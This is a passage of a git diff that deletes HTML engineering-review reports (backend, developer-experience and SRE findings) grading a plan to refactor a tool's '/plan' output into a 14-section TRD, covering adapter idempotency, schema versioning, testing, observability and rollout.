-<td>Consider adding <code>trd_sha</code> (content hash) alongside <code>last_aligned_with</code> (commit SHA) in EPIC-5-S1.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>CA2</td>
-<td>Add a TRD <code>template_version</code> field so legitimate template evolution doesn't trigger the drift-by-addition negative.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>CA8</td>
-<td>Add a round-trip integration eval: <code>/plan</code> output → <code>/plan-review</code> asserts no Critical findings.</td>
-</tr>
-</tbody>
-</table>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
deleted file mode 100644
index d4142e75..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
+++ /dev/null
@@ -1,165 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="backend-engineer--detailed-findings">Backend Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="backend-engineer-review-grade-c">Backend Engineer Review (Grade: C+)</h2>
-<p><strong>Scope:</strong> Python-touching stories in Shield's own codebase. Primary target: EPIC-4-S3 (adapter changes). Secondary: EPIC-2-S1 / EPIC-5-S1 (schema bumps), EPIC-3-S1/S2/S3 (eval wiring).
-<strong>Stack detected:</strong> Python (uv-managed). <code>pyproject.toml</code> at <code>shield/adapters/clickup/</code>, plus <code>shield/adapters/sast/*/pyproject.toml</code>. No framework-specific Python skills yet — agnostic review applies.</p>
-<h3 id="score-summary">Score Summary</h3>
-<table>
-<thead>
-<tr>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Rationale</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>API design / adapter interface stability (EPIC-4-S3)</td>
-<td><strong>C</strong></td>
-<td>Schema shape locked, but adapter contract (signature, return type, error model, per-tool retry/idempotency) unspecified</td>
-</tr>
-<tr>
-<td>Schema versioning discipline (EPIC-2-S1, EPIC-5-S1)</td>
-<td><strong>B</strong></td>
-<td>Bumps to 1.2/1.3 with explicit back-compat statements; no formal <code>$id</code>/<code>$schema</code>, no validator, no rejection of unknown future versions</td>
-</tr>
-<tr>
-<td>Testing strategy (EPIC-3 + EPIC-4-S3 fixtures)</td>
-<td><strong>B-</strong></td>
-<td>Strong fixture topology for TRD format; per-adapter fixtures only sketched — HTTP-mocking strategy, fault-injection, and idempotency replay absent</td>
-</tr>
-<tr>
-<td>Framework patterns / uv-based deps (adapter package layout)</td>
-<td><strong>D</strong></td>
-<td>Plan adds adapter logic in <code>shield/adapters/</code> for Confluence/Jira/Notion but only <code>clickup</code> is a packaged uv module today; no story scaffolds new packages, deps, or test harness</td>
-</tr>
-<tr>
-<td>Error &amp; observability (adapter failure modes)</td>
-<td><strong>D+</strong></td>
-<td>One log-line described; no structured logging, no partial-failure semantics, no metric/event surface</td>
-</tr>
-<tr>
-<td>Concurrency &amp; idempotency (sync re-runs, design_refs upserts)</td>
-<td><strong>D</strong></td>
-<td>EPIC-2-S2 mentions &quot;preserved or updated in place&quot;; nothing about idempotent remote-link upsert (Jira/Confluence remote-links can dupe on re-run without externalId)</td>
-</tr>
-<tr>
-<td>Deployment safety / blast radius (direct cutover)</td>
-<td><strong>C</strong></td>
-<td>Direct cutover acknowledged; rollback path documented; but no kill switch, no canary, and EPIC-1-S2 mutates <code>output-paths.yaml</code> keys (consumer-facing contract)</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Composite: C+</strong> — the plan's <em>what</em> is well-shaped; the <em>how</em> leaks responsibility to implementation time for the parts that historically cause incidents (adapter idempotency, partial failures, schema validator wiring).</p>
-<h3 id="detailed-evaluation">Detailed Evaluation</h3>
-<h4 id="1-api-design--adapter-interface-stability--c">1. API design / adapter interface stability — <strong>C</strong></h4>
-<p><strong>What the plan says:</strong></p>
-<ul>
-<li>EPIC-4-S3 task: &quot;Update the relevant adapter logic (Python under <code>shield/adapters/</code>) for each tool: Confluence remote link, Jira remote-issue-link, ClickUp URL custom field, Notion URL property.&quot;</li>
-<li>EPIC-4-S3 task: &quot;Adapters that do not understand <code>design_refs[]</code> (or have no link affordance) log 'design_refs forwarding skipped — adapter does not support web links' instead of failing.&quot;</li>
-</ul>
-<p><strong>Gaps:</strong></p>
-<ul>
-<li><strong>No adapter interface contract.</strong> No Python function/method signature for <code>design_refs[]</code> forwarding. Without a typed contract, four adapters will drift in shape.</li>
-<li><strong>No return-type discipline.</strong> <code>pm-sync</code> already has a <code>pm_sync</code> MCP tool surface (<code>shield/adapters/clickup/server/tools/sync.py:115</code>). The plan doesn't say how the new forwarding result threads back into the existing <code>sync_auto_link</code> action_log path.</li>
-<li><strong>The four adapters are heterogeneous on link semantics</strong> — Jira remote-issue-link, Confluence remote-link, ClickUp URL custom-field, Notion URL property. The plan treats them as a single bullet.</li>
-<li><strong>No idempotency key.</strong> Jira/Confluence remote-links accept a <code>globalId</code> precisely so reruns don't duplicate.</li>
-</ul>
-<h4 id="2-schema-versioning-discipline--b">2. Schema versioning discipline — <strong>B</strong></h4>
-<p><strong>Strengths:</strong> Two version bumps with explicit back-compat statements. <code>DesignRef</code> shape published. <code>last_aligned_with: string | null</code> precisely typed.</p>
-<p><strong>Gaps:</strong></p>
-<ul>
-<li><strong>No machine-readable JSON Schema.</strong> The sidecar schema lives as prose+jsonc. No validator, no story to add one. This is the inflection point where prose-only schemas drift.</li>
-<li><strong>No forward-compat policy.</strong> What does <code>/plan-review</code> do when it encounters <code>version: &quot;1.4&quot;</code> from a future Shield?</li>
-<li><strong><code>doc ∈ {trd, lld, prd}</code> is an enum</strong> but the plan does not say whether it's enforced. Unknown <code>doc</code> should fail validation.</li>
-<li><strong><code>design_refs[]</code> cardinality.</strong> EPIC-2-S2 says &quot;at least one TRD design_ref per story&quot; — should be lifted into <code>sidecar-schema.md</code> as a &quot;minimum 1&quot; constraint.</li>
-</ul>
-<h4 id="3-testing-strategy--b-">3. Testing strategy — <strong>B-</strong></h4>
-<p><strong>Strengths:</strong> TRD-format eval matrix genuinely well-designed. 14 missing-section + drift + vague-TBD is right shape and matches CLAUDE.md eval-coverage mandate. &quot;Named, distinguishable error&quot; requirement (EPIC-3-S2 AC) is a sharp testability bar.</p>
-<p><strong>Gaps:</strong></p>
-<ul>
-<li><strong>Adapter fixtures are one bullet for four heterogeneous REST APIs.</strong> No mention of <code>responses</code>/<code>vcrpy</code>/in-memory fake. <code>shield/adapters/clickup/tests/test_contract.py</code> already exists — plan should explicitly extend that pattern.</li>
-<li><strong>No re-run / idempotency test.</strong> EPIC-2-S2 AC says &quot;Re-running /plan does not duplicate entries.&quot; Where is the fixture proving this? Same for EPIC-4-S3.</li>
-<li><strong>No failure-injection fixture for partial-success.</strong> Confluence accepts, Jira 5xxs — does <code>/pm-sync</code> exit non-zero? Continue?</li>
-<li><strong>EPIC-3-S2 AC undercounts negatives.</strong> &quot;14 missing-section&quot; + drift + vague-TBD = 16 total. EPIC-3-S3 says &quot;all 13 negatives fail&quot; — 14 vs 13 inconsistency.</li>
-</ul>
-<h4 id="4-framework-patterns--uv-based-deps--d">4. Framework patterns / uv-based deps — <strong>D</strong></h4>
-<p>This is the weakest point.</p>
-<ul>
-<li><strong>Only one adapter exists today as a uv package.</strong> Repo has <code>shield/adapters/clickup/pyproject.toml</code> and that's it. <strong>There is no <code>shield/adapters/jira/</code>, <code>confluence/</code>, or <code>notion/</code>.</strong> EPIC-4-S3 implies four-tool work but contains zero scaffolding tasks.</li>
-<li><strong>CLAUDE.md mandates uv-only Python.</strong> Each new adapter needs its own <code>pyproject.toml</code> declaring deps like <code>atlassian-python-api</code> or <code>requests</code>, plus a dev-dep for the test harness. Plan does not name any HTTP-client library.</li>
-<li><strong>No shared utility module.</strong> Four adapters will need the same <code>DesignRef</code> dataclass, the same &quot;skip if no link affordance&quot; decision, and the same logging shape. No <code>shield/adapters/_common/</code> story.</li>
-</ul>
-<h4 id="5-error--observability--d">5. Error &amp; observability — <strong>D+</strong></h4>
-<ul>
-<li><strong>One log line ≠ observability.</strong> No log level, no structured fields, no counter/event emission, no partial-failure surface.</li>
-<li><strong>No error taxonomy.</strong> What happens on malformed <code>anchor_url</code>? Adapter 401/403 vs 4xx vs 5xx? Rate-limited?</li>
-<li><strong>No retry policy.</strong> ClickUp adapter today almost certainly has retry/backoff. Plan doesn't say new adapters inherit it.</li>
-<li><strong><code>action_log</code> integration.</strong> Existing clickup adapter writes structured records (<code>action=&quot;sync_auto_link&quot;</code> at <code>sync.py:319</code>). EPIC-4-S3 should require a new action type <code>forward_design_ref</code> for traceability.</li>
-</ul>
-<h4 id="6-concurrency--idempotency--d">6. Concurrency &amp; idempotency — <strong>D</strong></h4>
-<ul>
-<li><strong>Upsert semantics undefined.</strong> Jira's remote-issue-link API uses <code>globalId</code> for upsert; without one, every <code>/pm-sync</code> re-run posts a duplicate. Obvious idempotency key: <code>globalId = sha256(story_id + anchor_url)</code>.</li>
-<li><strong>Confluence content-property</strong> vs <strong>inline-link</strong> distinction — Confluence has multiple &quot;remote link&quot;-shaped affordances and plan does not pick one.</li>
-<li><strong>No concurrent-sync story.</strong> Two engineers running <code>/pm-sync</code> on the same plan — locking or last-write-wins?</li>
-<li><strong>EPIC-5-S1 last_aligned_with race:</strong> what if <code>/implement</code> flips two stories to <code>done</code> from concurrent sessions?</li>
-</ul>
-<h4 id="7-deployment-safety--blast-radius--c">7. Deployment safety / blast radius — <strong>C</strong></h4>
-<p><strong>Strengths:</strong> Rollback path explicit. <code>design_refs[]</code> and <code>last_aligned_with</code> are additive. Pre-refactor folders stay readable.</p>
-<p><strong>Gaps:</strong></p>
-<ul>
-<li><strong><code>shield/schema/output-paths.yaml</code> is a consumer-facing contract.</strong> EPIC-1-S2 says &quot;replace <code>plan_arch_md</code> with <code>plan_trd_md</code>.&quot; Header reads &quot;Plugin-owned contract. Consumers should NOT edit.&quot; Consumers may depend on the key name. Plan should <em>add</em> <code>plan_trd_md</code> while keeping <code>plan_arch_md</code> deprecated.</li>
-<li><strong>No kill switch.</strong> &quot;Direct cutover&quot; with eval-shaped safety is reasonable for internal tool — but worth one sentence acknowledging only remedy is revert-the-PR.</li>
-<li><strong>Cross-PR coupling.</strong> EPIC-2-S1 (schema 1.2) in M1; EPIC-5-S1 (schema 1.3) in M3. If M2 ships and M3 stalls, sidecars stay at 1.2 with no <code>last_aligned_with</code> — fine because optional, but plan should affirm.</li>
-</ul>
-<h3 id="recommendations">Recommendations</h3>
-<h4 id="p0-block-merge-of-plan-into-implementation">P0 (block merge of plan into implementation)</h4>
-<p><strong>P0-1.</strong> Specify the adapter interface for <code>design_refs[]</code> forwarding (EPIC-4-S3). Lock the function signature and idempotency key across all four adapters: <code>forward_design_refs(task_id: str, refs: list[DesignRef]) -&gt; ForwardResult</code> with <code>ForwardResult{created, skipped, errors}</code>. Each ref produces <code>sha256(story_id + anchor_url)[:32]</code> used as <code>globalId</code>.</p>
-<p><strong>P0-2.</strong> Add an idempotency test fixture: &quot;Running <code>/pm-sync</code> twice in succession on the same plan produces the same remote state — no duplicate remote-links, no duplicate ClickUp custom-field writes.&quot;</p>
-<p><strong>P0-3.</strong> Add an adapter-scaffolding story or split EPIC-4-S3 by adapter. Only ClickUp exists as a uv package today. Either split into EPIC-4-S3a/b/c/d each with own scaffold, or add EPIC-4-S0: &quot;Scaffold <code>shield/adapters/{jira,confluence,notion}/</code> uv packages with <code>pyproject.toml</code>, MCP-server skeleton, <code>tests/</code>, and shared <code>shield/adapters/_common/design_refs.py</code>.&quot;</p>
-<p><strong>P0-4.</strong> Resolve the 14 vs 13 inconsistency across all artifacts.</p>
-<h4 id="p1-fix-before-implementation-milestone-closes">P1 (fix before implementation milestone closes)</h4>
-<p><strong>P1-1.</strong> Add a schema-validation story: <code>shield/scripts/validate_plan.py</code> using <code>pydantic</code> or <code>jsonschema</code>, invoked by <code>/plan-review</code> and the eval runner.</p>
-<p><strong>P1-2.</strong> Document forward-compat policy in <code>sidecar-schema.md</code>.</p>
-<p><strong>P1-3.</strong> Specify the HTTP test harness: &quot;Adapter eval fixtures use <code>responses</code> (or <code>respx</code>) to mock the remote APIs. No live HTTP. Tests tagged <code>@pytest.mark.adapter_contract</code> so they can run in CI without secrets.&quot;</p>
-<p><strong>P1-4.</strong> Specify observability shape: one <code>action_log</code> entry per ref forwarded with <code>action='forward_design_ref'</code>, fields <code>{story_id, adapter, anchor_url, outcome, idempotency_key}</code>. Failures emit <code>forward_design_ref_failed</code>.</p>
-<p><strong>P1-5.</strong> Add deprecation overlap for <code>output-paths.yaml</code>: keep <code>plan_arch_md</code> / <code>plan_arch_html</code> keys marked <code>deprecated: true</code>.</p>
-<h4 id="p2-polish-not-blocking">P2 (polish, not blocking)</h4>
-<ul>
-<li>Concurrent-sync acknowledgement in plan-architecture.md</li>
-<li>Rate-limit handling note per existing adapter posture</li>
-<li>Decide fate of this plan's own <code>plan-architecture.md</code> post-M1</li>
-</ul>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
deleted file mode 100644
index 2b699559..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
+++ /dev/null
@@ -1,216 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="dx-engineer--detailed-findings">DX Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="dx-engineer-review-grade-b">DX Engineer Review (Grade: B+)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX1</td>
-<td>Plan clarity</td>
-<td>A</td>
-<td>&quot;Why this refactor&quot; paragraph and milestone table give 30-second comprehension — &quot;unified 14-section TRD replacing free-form plan-architecture.md, covers backend + infra, direct cutover.&quot;</td>
-</tr>
-<tr>
-<td>DX2</td>
-<td>Story actionability</td>
-<td>B</td>
-<td>Most stories name exact files and concrete deltas. Gaps: EPIC-2-S2 names a &quot;heuristic for picking section_id&quot; but never defines what keyword-matching algorithm to use; EPIC-4-S3 says &quot;the relevant adapter logic (Python under shield/adapters/)&quot; without naming any of the 4 adapter files.</td>
-</tr>
-<tr>
-<td>DX3</td>
-<td>Implementation step detail</td>
-<td>B</td>
-<td>Strong specifics in many places (slug allow-list verbatim, domain-detection markers enumerated, thresholds quantified). Weak spots: EPIC-3-S2 doesn't show the YAML schema; EPIC-3-S3 says <code>uv run shield/evals/run.py plan-trd</code> &quot;or equivalent existing eval runner&quot; — author should commit to one.</td>
-</tr>
-<tr>
-<td>DX4</td>
-<td>Ambiguity audit</td>
-<td>B</td>
-<td>Several soft phrases survived: EPIC-4-S2 &quot;e.g., flag if &gt; 80 characters&quot; (advisory not normative); EPIC-5-S2 &quot;more than N lines&quot; and only later pins N=20; EPIC-1-S2 &quot;Mixed → annotate per section&quot; is undefined; EPIC-2-S2 says entries are &quot;preserved or updated in place&quot; — which is it?</td>
-</tr>
-<tr>
-<td>DX5</td>
-<td>Context sufficiency</td>
-<td>A</td>
-<td>Plan links to research.md, plan-architecture.md, and PR #43 sample. A new joiner can chase the references without tribal knowledge.</td>
-</tr>
-<tr>
-<td>DX6</td>
-<td>Dependency clarity</td>
-<td>A</td>
-<td>Milestone-level <code>depends_on</code> is explicit. M1 ships as a single PR is called out. Eval-before-generator constraint is documented. Minor gap: story-level depends_on is implicit only.</td>
-</tr>
-<tr>
-<td>DX7</td>
-<td>Tool &amp; access requirements</td>
-<td>C</td>
-<td><code>uv</code> implied by CLAUDE.md but never restated. EPIC-4-S3 needs Confluence/Jira/ClickUp/Notion credentials with no mention of test accounts, sandbox tenants, or how to mock. No mention of which Python version or new deps the eval runner might need.</td>
-</tr>
-<tr>
-<td>DX8</td>
-<td>Handoff readiness</td>
-<td>B</td>
-<td>A developer can start EPIC-1-S1, EPIC-3-S1, EPIC-3-S2 cold. EPIC-4-S3 and EPIC-2-S2 would generate questions. Plan assumes familiarity with <code>plan-docs/SKILL.md</code> &quot;generation prompt&quot; current shape.</td>
-</tr>
-<tr>
-<td>DX9</td>
-<td>Service boundaries</td>
-<td>B</td>
-<td>Boundaries are clean: <code>shield/commands/plan.md</code>, <code>shield/skills/general/plan-docs/</code>, <code>shield/schema/output-paths.yaml</code>, <code>shield/adapters/&lt;tool&gt;/</code>, <code>shield/evals/</code>. Gap: slug allow-list location is given as &quot;YAML or JSON sidecar under shield/schema/&quot; with choice left open.</td>
-</tr>
-<tr>
-<td>DX10</td>
-<td>API &amp; data flow design</td>
-<td>B</td>
-<td><code>design_refs[]</code> contract is explicit. Schema bump path documented (1.1 → 1.2 → 1.3). Gap: no inline example <code>design_refs[]</code> JSON instance; EPIC-2-S2's &quot;preserved or updated in place&quot; merge semantics absent.</td>
-</tr>
-<tr>
-<td>DX11</td>
-<td>Deployment strategy</td>
-<td>B</td>
-<td>&quot;Direct cutover, no feature flag&quot; is explicit. &quot;M1 ships as a single PR&quot; specifies atomicity. Old <code>plan-architecture.md</code> files preserved. Rollback strategy documented. Gap: no version bump checklist for <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> per CLAUDE.md.</td>
-</tr>
-<tr>
-<td>DX12</td>
-<td>CI/CD integration</td>
-<td>C</td>
-<td>EPIC-3-S3 names &quot;Wire eval into CI&quot; but tasks only describe manual PR-body capture. No GitHub Action, no workflow file path, no auto-discovery of new evals. Story title says CI but tasks describe manual capture.</td>
-</tr>
-<tr>
-<td>DX13</td>
-<td>Error handling patterns</td>
-<td>B</td>
-<td>Several failure modes addressed (adapters without link affordance log + continue, <code>n/a — &lt;reason&gt;</code> escape, missing-reason flagged distinct from vague-TBD). Gap: malformed <code>trd.md</code> recovery? Unknown <code>doc</code> value in <code>design_refs[]</code>? Retry/idempotency for <code>/pm-sync</code> partial failures?</td>
-</tr>
-<tr>
-<td>DX14</td>
-<td>Configuration management</td>
-<td>C</td>
-<td>EPIC-1-S2 description says &quot;.shield.json + repo markers&quot; but plan.md drops the .shield.json mention. No mention of secrets management for 4 adapter credentials. Slug allow-list filename left to implementer.</td>
-</tr>
-<tr>
-<td>DX15</td>
-<td>Developer onboarding</td>
-<td>B</td>
-<td>plan-architecture.md is fine onboarding. research.md named authoritative. CLAUDE.md covers conventions. Gap: no local-dev &quot;how do I run /plan and see trd.md emit?&quot; walkthrough; no debugging note for non-deterministic eval failures.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The plan is one of the more actionable specs reviewed — concrete file paths, verbatim slug allow-list, specific thresholds, clear cutover stance — but four soft spots will generate Slack pings during execution: (1) <code>design_refs[]</code> section_id heuristic underspecified, (2) EPIC-4-S3 doesn't list 4 adapter file paths, (3) &quot;CI&quot; in EPIC-3-S3 is actually PR-body capture, (4) Mixed-domain &quot;annotate per section&quot; output format undefined.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>DX2</td>
-<td>In EPIC-4-S3, replace &quot;the relevant adapter logic (Python under shield/adapters/)&quot; with the four explicit file paths and the function/class to extend in each.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX4</td>
-<td>In EPIC-2-S2 tasks, define the <code>section_id</code> selection heuristic concretely: name the exact keyword-matching algorithm.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX4</td>
-<td>In EPIC-2-S2 AC #3, replace &quot;existing entries are preserved or updated in place&quot; with a precise merge rule.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX12</td>
-<td>In EPIC-3-S3, decide whether eval runs in GitHub Actions or only in PR-body capture. If CI is in scope, add a workflow YAML task; if not, retitle.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX4</td>
-<td>In EPIC-1-S2, define what &quot;Mixed → annotate per section&quot; emits in the TRD prose.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX7</td>
-<td>Add a &quot;Tool &amp; access requirements&quot; subsection covering test tenants, credential location, Python deps.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX14</td>
-<td>In EPIC-1-S2, decide and document: does domain detection consult <code>.shield.json</code> or only repo markers? The two documents disagree.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX3</td>
-<td>In EPIC-3-S2/S3, lock the eval runner invocation.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX9</td>
-<td>In EPIC-1-S1, choose YAML or JSON for the slug allow-list sidecar and commit to a filename.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX10</td>
-<td>Add an inline example <code>design_refs[]</code> JSON instance to EPIC-2-S1 description.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX11</td>
-<td>Add a task to EPIC-1-S2 (or a separate release story) for version bumps in <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code>.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX13</td>
-<td>Add an AC or task covering <code>/pm-sync</code> partial-failure behavior when 1 of 4 adapters errors.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX15</td>
-<td>Add a &quot;local development&quot; note describing how to run <code>/plan</code> against a fixture repo.</td>
-</tr>
-</tbody>
-</table>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html
deleted file mode 100644
index 027d83ec..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html
+++ /dev/null
@@ -1,148 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="sre--detailed-findings">SRE — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="operations-review--plan-grade-c">Operations Review — Plan (Grade: C)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>OP1</td>
-<td>Observability plan</td>
-<td>C</td>
-<td>Eval fixtures (EPIC-3) are the primary observability surface — they tell us when the TRD format drifts. <code>last_aligned_with</code> (EPIC-5-S1) is mentioned as undead-doc telemetry. But no plan for: emitting structured logs from <code>/plan</code> runs, capturing failure telemetry from real-user <code>/plan</code> invocations, or reporting on TRD generation quality in production. The eval is offline only.</td>
-</tr>
-<tr>
-<td>OP2</td>
-<td>Monitoring &amp; alerting</td>
-<td>F</td>
-<td>The plan says nothing about alerting on <code>/plan</code> failure or how regression in CI is surfaced. EPIC-3-S3 captures a PR-time RED→GREEN paper trail but doesn't wire the eval into ongoing CI — only into the implementation PR description. No mention of who is notified if the eval fails post-merge on a future change. No escalation path defined.</td>
-</tr>
-<tr>
-<td>OP3</td>
-<td>Failure mode analysis</td>
-<td>C</td>
-<td>Some failure modes addressed (format drift via eval, undead-doc via <code>last_aligned_with</code>, re-run safety via EPIC-1-S3 guard). But several first-order failure modes from the refactor itself are not covered: (a) what happens when <code>/plan</code> runs but emits a malformed <code>trd.md</code> after M1 lands; (b) mixed-domain repos where domain detection misfires; (c) what happens if <code>/plan-review</code> (M2) ships against TRDs that pre-date M1's slug allow-list; (d) the eval cannot validate semantic correctness — only structure.</td>
-</tr>
-<tr>
-<td>OP4</td>
-<td>Backup &amp; recovery</td>
-<td>B</td>
-<td>Strong implicit answer: git history is explicitly called the archive. Existing <code>plan-architecture.md</code> files are preserved. RPO for the tool is effectively zero (everything is source-controlled markdown). RTO for a bad emit is &quot;git revert + re-run /plan&quot;. Minor gap: no corruption-recovery for a half-written <code>trd.md</code>.</td>
-</tr>
-<tr>
-<td>OP5</td>
-<td>Capacity planning</td>
-<td>B</td>
-<td>Not a scale-sensitive system. The plan implicitly handles growth by being additive. No explicit consideration of number of <code>design_refs[]</code> per story or whether the 14-section template scales to large/small features without padding. Acceptable for meta-tooling context.</td>
-</tr>
-<tr>
-<td>OP6</td>
-<td>Change management</td>
-<td>C</td>
-<td>§Rollback Strategy is concrete. M1 is correctly identified as atomic-PR. However: (a) no canary or staged rollout — direct cutover is the choice but blast radius is every future <code>/plan</code> run; (b) no rollback <em>trigger</em> defined; (c) the version-bump discipline from CLAUDE.md is not in any story's task list.</td>
-</tr>
-<tr>
-<td>OP7</td>
-<td>On-call readiness</td>
-<td>D</td>
